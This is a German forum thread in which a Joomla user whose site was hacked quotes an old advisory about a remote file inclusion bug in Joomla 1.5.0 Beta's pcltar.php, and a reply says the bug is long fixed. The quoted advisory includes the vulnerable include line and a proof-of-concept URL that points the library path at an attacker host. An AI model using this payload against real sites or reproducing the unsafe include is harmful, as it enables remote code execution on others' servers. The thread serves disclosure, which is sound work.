Thema: Sicherheitslücke gefunden

Hi.. heute wurde meine Joomla 1.5 seite gehacked.. und da hab ich bischen in google gesucht und folgendes gefunden.. vllt hat der Hacker auch damit angegriffen..
ich möchte blos das die entwickler falls sie das nicht schon kennen es analysieren und auhc einen schutz dagegen einbauen
das hier habe ich gefunden:

Code:

Hi,
Joomla! 1.5.0 is in Beta version and "should NOT to be used for `live`
or `production` sites."
Joomla 1.0.12 has a good security but it seems that Joomla 1.5.0 doesnt
have a good security approach. Anyway, there is a remote file inclusion
in Joomla 1.5.0 Beta :

File /libraries/pcl/pcltar.php, Line 74 :
 if (!defined("PCLERROR_LIB"))
 {
       include($g_pcltar_lib_dir."/pclerror.lib.".$g_pcltar_extension);
 }

POC : http://hacked/libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://hacker/?

The original advisory (in Persian) is located at :
http://www.hackers.ir/advisories/joomla.html


- Omid

# milw0rm.com [2007-04-23]

Hoffe ich konnte bischen zur sicherheit von joomla helfen
Greetz L1nK

die entwickler wissen das längst ist auch schon lang gefixt
müssen die Hacker bei dir ein anderes Loch wohl gefunden haben...

http://forum.joomla.org/index.php/topic,174016.0.html

Joomla! 1.5.0 is in Beta version and "should NOT to be used for `live`
or `production` sites."

Viel mehr gibt's meiner Meinung nach eigentlich nicht zu sagen.